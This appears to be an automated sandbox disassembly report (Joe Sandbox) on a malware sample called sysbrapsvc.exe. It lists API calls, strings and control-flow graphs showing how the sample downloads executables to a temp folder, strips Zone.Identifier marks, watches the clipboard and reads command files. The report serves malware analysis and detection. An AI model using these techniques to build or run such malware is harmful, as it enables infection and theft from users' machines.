                                                                                • Opcode Fuzzy Hash: aff6f25d3f8000eba581a1516f813dc5f7da4df36a577d5272a130dde58f2203
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNELBASE ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNELBASE(?), ref: 0040F2F9
                                                                                Strings
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 3526668077-2417596247
                                                                                • Opcode ID: 8fcd0f09372c00a3cbb61bbde4d05531ec90484324228f58d9270ea4f8841c2f
                                                                                • Instruction ID: 8d9dde5e83d6f5576f0fa95dcda068e4d807ca32b5c879c9ce831b2193034ea7
                                                                                • Opcode Fuzzy Hash: 8fcd0f09372c00a3cbb61bbde4d05531ec90484324228f58d9270ea4f8841c2f
                                                                                • Instruction Fuzzy Hash: 7D91EBB5940318ABE720DB50DC49FEA3379AF88701F0485B9F609A51C1DABD9AC8CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 115 40b350-40b367 call 40b280 118 40b369 115->118 119 40b36e-40b38a call 40aed0 strcmp 115->119 120 40b5f5-40b5f8 118->120 123 40b391-40b3ad call 40aed0 strstr 119->123 124 40b38c 119->124 127 40b3f0-40b40c call 40aed0 strstr 123->127 128 40b3af-40b3cb call 40aed0 strstr 123->128 124->120 135 40b40e-40b42a call 40aed0 strstr 127->135 136 40b44f-40b46b call 40aed0 strstr 127->136 133 40b3eb 128->133 134 40b3cd-40b3e9 call 40aed0 strstr 128->134 133->120 134->127 134->133 145 40b44a 135->145 146 40b42c-40b448 call 40aed0 strstr 135->146 143 40b46d-40b489 call 40aed0 strstr 136->143 144 40b4ae-40b4c4 EnterCriticalSection 136->144 155 40b4a9 143->155 156 40b48b-40b4a7 call 40aed0 strstr 143->156 148 40b4cf-40b4d8 144->148 145->120 146->136 146->145 151 40b509-40b514 call 40b600 148->151 152 40b4da-40b4ea 148->152 164 40b5ea-40b5ef LeaveCriticalSection 151->164 165 40b51a-40b528 151->165 157 40b507 152->157 158 40b4ec-40b505 call 40d950 152->158 155->120 156->144 156->155 157->148 158->151 164->120 167 40b52a 165->167 168 40b52e-40b530 call 40a240 165->168 167->168 170 40b535-40b53f 168->170 170->164 171 40b545-40b562 call 40d950 170->171 174 40b564-40b574 171->174 175 40b5ba-40b5d2 171->175 177 40b580-40b5b8 call 40a660 174->177 178 40b576-40b57e Sleep 174->178 176 40b5d8-40b5e3 call 40b600 175->176 176->164 183 40b5e5 call 40b030 176->183 177->176 178->174 183->164
                                                                                APIs
                                                                                  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                • strcmp.NTDLL ref: 0040B380
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostnamestrcmp
                                                                                • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                • API String ID: 2906596889-2213908610
                                                                                • Opcode ID: a84fc12e8fb4865d36b1ea06ef6f0599483274ee2da903410dbdfc319e881692
                                                                                • Instruction ID: 1e2a78016ab808788e4a3d10fbde234ca2a84306dd4339bbdfb36d09265cce6e
                                                                                • Opcode Fuzzy Hash: a84fc12e8fb4865d36b1ea06ef6f0599483274ee2da903410dbdfc319e881692
                                                                                • Instruction Fuzzy Hash: C76171B5940305A7DB00AB61EC46BAA3765AB10318F18847AFC05673C2F77DE664C6DF

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 185 405910-405932 GetWindowLongW 186 405934-40593b 185->186 187 405956-40595d 185->187 188 405941-405945 186->188 189 4059c7-4059d8 IsClipboardFormatAvailable 186->189 190 405986-40598c 187->190 191 40595f 187->191 197 405964-405981 SetClipboardViewer SetWindowLongW 188->197 198 405947-40594b 188->198 195 4059e3-4059ed IsClipboardFormatAvailable 189->195 196 4059da-4059e1 189->196 193 4059a6-4059aa 190->193 194 40598e-4059a4 SetWindowLongW 190->194 192 405b44-405b5d DefWindowProcA 191->192 199 4059c2 193->199 200 4059ac-4059bc SendMessageA 193->200 194->199 202 4059f8-405a02 IsClipboardFormatAvailable 195->202 203 4059ef-4059f6 195->203 201 405a0b-405a0f 196->201 197->192 204 405951 198->204 205 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 198->205 199->192 200->199 207 405a15-405a1f OpenClipboard 201->207 208 405adf-405ae3 201->208 202->201 206 405a04 202->206 203->201 204->192 205->192 206->201 207->208 211 405a25-405a36 GetClipboardData 207->211 209 405ae5-405af5 SendMessageA 208->209 210 405afb 208->210 209->210 210->192 212 405a38 211->212 213 405a3d-405a4e GlobalLock 211->213 212->192 214 405a50 213->214 215 405a55-405a66 213->215 214->192 216 405a68-405a6c 215->216 217 405a89-405a9c call 405630 215->217 218 405a9e-405aae call 405750 216->218 219 405a6e-405a72 216->219 225 405ab1-405ac5 GlobalUnlock CloseClipboard 217->225 218->225 221 405a74 219->221 222 405a76-405a87 call 405510 219->222 221->225 222->225 225->208 228 405ac7-405adc call 4048a0 call 40a660 225->228 228->208
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: e0897a1c01658654bab4c30dd7d4a59a874db33c96eaa3b8bfa9dc0d479b6fc4
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: e0897a1c01658654bab4c30dd7d4a59a874db33c96eaa3b8bfa9dc0d479b6fc4
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysbrapsvc.exe,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNELBASE(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNELBASE ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$C:\Windows\sysbrapsvc.exe$Unnamed volume
                                                                                • API String ID: 899515741-3911162851
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNELBASE(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 264 40ec70-40ecaf CreateFileW 265 40ecb5-40ecd0 CreateFileMappingW 264->265 266 40edca-40edce 264->266 267 40edc0-40edc4 CloseHandle 265->267 268 40ecd6-40ecef MapViewOfFile 265->268 269 40edd0-40edf0 CreateFileW 266->269 270 40ee24-40ee2a 266->270 267->266 271 40ecf5-40ed0b GetFileSize 268->271 272 40edb6-40edba CloseHandle 268->272 273 40edf2-40ee12 WriteFile CloseHandle 269->273 274 40ee18-40ee1c call 40a660 269->274 275 40ed11-40ed24 call 40cca0 271->275 276 40edac-40edb0 UnmapViewOfFile 271->276 272->267 273->274 279 40ee21 274->279 275->276 281 40ed2a-40ed39 275->281 276->272 279->270 281->276 282 40ed3b-40ed5b call 40c640 281->282 284 40ed60-40ed6a 282->284 284->276 285 40ed6c-40ed97 call 40a990 memcmp 284->285 285->276 288 40ed99-40eda5 call 40a660 285->288 288->276
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: c771612281c407a2c0136b61b2377c082ab1d65baf527ffd144ccb78ffcbf32e
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: c771612281c407a2c0136b61b2377c082ab1d65baf527ffd144ccb78ffcbf32e
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 315 40d780-40d7b0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 316 40d7b6-40d7ca InterlockedExchangeAdd 315->316 317 40d899-40d8b0 GetCurrentThread SetThreadPriority 315->317 316->317 318 40d7d0-40d7d9 316->318 319 40d7dc-40d7e3 318->319 319->317 320 40d7e9-40d804 EnterCriticalSection 319->320 321 40d80f-40d817 320->321 322 40d857-40d86c LeaveCriticalSection 321->322 323 40d819-40d826 321->323 326 40d877-40d87d 322->326 327 40d86e-40d875 322->327 324 40d833-40d855 WaitForSingleObject 323->324 325 40d828-40d831 323->325 328 40d806-40d80c 324->328 325->328 329 40d88c-40d894 Sleep 326->329 330 40d87f-40d888 326->330 327->317 328->321 329->319 330->329 331 40d88a 330->331 331->317
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,02260638,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNELBASE(00000000,?,?,?,00407F75,02260638,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNELBASE(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Strings
                                                                                • C:\Users\user\tbtnds.dat, xrefs: 0040B7C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID: C:\Users\user\tbtnds.dat
                                                                                • API String ID: 439099756-4031448526
                                                                                • Opcode ID: 7522d26a6701077299d235e5744c4266a6018d639c07455c855527bb792da273
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: 7522d26a6701077299d235e5744c4266a6018d639c07455c855527bb792da273
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 378 405b60-405b92 InitializeCriticalSection CreateFileW 379 405c85-405c88 378->379 380 405b98-405bb3 CreateFileMappingW 378->380 381 405bb9-405bd2 MapViewOfFile 380->381 382 405c7b-405c7f CloseHandle 380->382 383 405c71-405c75 CloseHandle 381->383 384 405bd8-405bea GetFileSize 381->384 382->379 383->382 385 405bed-405bf1 384->385 386 405bf3-405bfa 385->386 387 405c67-405c6b UnmapViewOfFile 385->387 388 405bfc 386->388 389 405bfe-405c11 call 40ccd0 386->389 387->383 388->387 392 405c13 389->392 393 405c15-405c2a 389->393 392->387 394 405c3a-405c65 call 405c90 393->394 395 405c2c-405c38 call 40a660 393->395 394->385 395->387
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNELBASE(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Strings
                                                                                • C:\Users\user\tbtcmds.dat, xrefs: 00405B80
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID: C:\Users\user\tbtcmds.dat
                                                                                • API String ID: 3956458805-3965455335
